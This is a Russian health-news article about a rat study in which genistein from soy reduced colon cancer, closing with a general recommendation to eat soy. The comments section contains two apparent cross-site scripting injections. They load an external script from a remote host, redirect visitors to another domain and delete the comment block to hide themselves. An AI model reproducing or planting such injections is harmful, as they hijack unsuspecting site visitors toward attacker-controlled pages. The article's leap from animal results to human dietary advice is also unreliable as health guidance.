Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Соя спасет от рака кишки  >>  Соя спасет от рака кишки
 
Обратная связь
 

Соя спасет от рака кишки

Размер шрифта
02 октября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Когда вы ели соевые продукты последний раз? Отличные новости тех, кто их любит: ученые из Америки выяснили, что один из компонентов сои борется с раком толстой кишки!

Соя спасет от рака кишки

«В ходе выполнения нашей работы мы обнаружили, что употребление сои влияет на экспрессию трех генов, которые принимают участие в клеточном росте», – рассказывает Гонг Чен, профессор диетологии Университета штата Иллинойс (США). «Клетки, образующие слизистую кишечника, обновляются каждую неделю. Этот процесс контролируется сложными биохимическими механизмами, повреждение которых может привести к безудержному опухолевому росту».

Ученые выяснили, что генистеин – вещество, содержащееся в сое, – влияет на один из таких механизмов, блокируя сверхстимулирующее влияние на размножение клеток.

Такой вывод был сделан на основе нескольких экспериментов на крысах, на которых воздействовали химическими канцерогенами. При этом часть лабораторных животных кормили смесью, обогащенной генистеином. Через 13 недель кишечник животных исследовали на предмет наличия злокачественных новообразований.

Оказалось, что генистеин на 40% снижает частоту возникновения рака толстой кишки.

Кроме того, ученые проводили биохимические пробы на клеточных культурах, чтобы выяснить, как генистеин влияет на сигнальные пути в клетки. Выяснилось, что это вещество блокирует один из таких путей (он называется Wnt) и, по всей видимости, именно этот факт обуславливает впечатляющие противоопухолевые свойства генистеина.

Данная работа служит лишним подтверждением тому факту, что рак толстой кишки – заболевание, в развитие которого участвуют факторы внешней среды (в том числе и диета). Это крайне важно с точки зрения профилактики онкологических заболеваний.

Так что ешьте соевые продукты – здоровее будете! 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

30 апреля 2015 в 14:07

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 19:02

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Соевые продукты не просто уменьшают риск рака, но и количество метастазов почти на 100%   Узнайте, будет ли у вас рак в течение 10 лет   Длинные стройные ноги… Красота! А риск рака выше   Какой напиток не позволит вам ослепнуть?!  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Что можно и чего нельзя с изжогой?
Бронхит: лицом к лицу
Еда против рака. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.